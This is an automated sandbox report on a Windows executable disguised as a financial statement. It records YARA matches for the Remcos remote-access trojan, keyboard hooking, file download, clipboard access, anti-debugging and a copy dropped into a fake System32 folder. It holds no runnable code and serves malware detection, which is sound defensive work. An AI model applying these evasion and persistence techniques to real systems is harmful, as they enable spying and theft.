          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_trait
s@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait7_2_0040D2A6
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_trait
s@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait7_2_0040D2A6
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, 00000001.00000002.701101686.000000000140B000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 7_2_0040532D
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 25_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 25_2_0040532D

          E-Banking Fraud:

          Yara detected Remcos RAT
          Source: Yara match File source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.780636700.0000000003E8B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000010.00000002.781443613.00000000049AD000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000018.00000002.752626728.0000000003279000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000018.00000002.759339292.0000000003C85000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 4480, type: MEMORY
          Source: Yara match File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 7144, type: MEMORY
          Source: Yara match File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 5772, type: MEMORY
          Source: Yara match File source: Process Memory Space: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880, type: MEMORY
          Source: Yara match File source: Process Memory Space: PxxoServicesTrialNet1.exe PID: 6788, type: MEMORY
          Source: Yara match File source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
          Source: 00000021.00000002.728536035.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3ca6f88.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ce510.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 33.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 25.2.PxxoServicesTrialNet1.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 15.2.PxxoServicesTrialNet1.exe.55bf940.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.PxxoServicesTrialNet1.exe.559e920.4.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 24.2.PxxoServicesTrialNet1.exe.3c85f68.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4395598.4.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          Source: 16.2.PxxoServicesTrialNet1.exe.49ad4f0.6.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.4374578.5.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
          .NET source code contains very large strings
          Source: EXTRACTOSERFINANZA989543704031499704092798964.exe, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 1.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 1.0.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: PxxoServicesTrialNet1.exe.7.dr, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 7.0.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 7.2.EXTRACTOSERFINANZA989543704031499704092798964.exe.ab0000.1.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 15.2.PxxoServicesTrialNet1.exe.8e0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 15.0.PxxoServicesTrialNet1.exe.8e0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 16.0.PxxoServicesTrialNet1.exe.fd0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 16.2.PxxoServicesTrialNet1.exe.fd0000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 23.0.PxxoServicesTrialNet1.exe.320000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 23.2.PxxoServicesTrialNet1.exe.320000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 24.0.PxxoServicesTrialNet1.exe.530000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 24.2.PxxoServicesTrialNet1.exe.530000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 25.2.PxxoServicesTrialNet1.exe.870000.1.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: 25.0.PxxoServicesTrialNet1.exe.870000.0.unpack, ??????????????????????????????????????/????????????????.cs Long String: Length: 890043
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 15_2_014EBC60 NtSetInformationThread, 15_2_014EBC60
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 16_2_0192BC60 NtSetInformationThread, 16_2_0192BC60
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: 24_2_0103BC60 NtSetInformationThread, 24_2_0103BC60
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait7_2_0040D2A6
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@G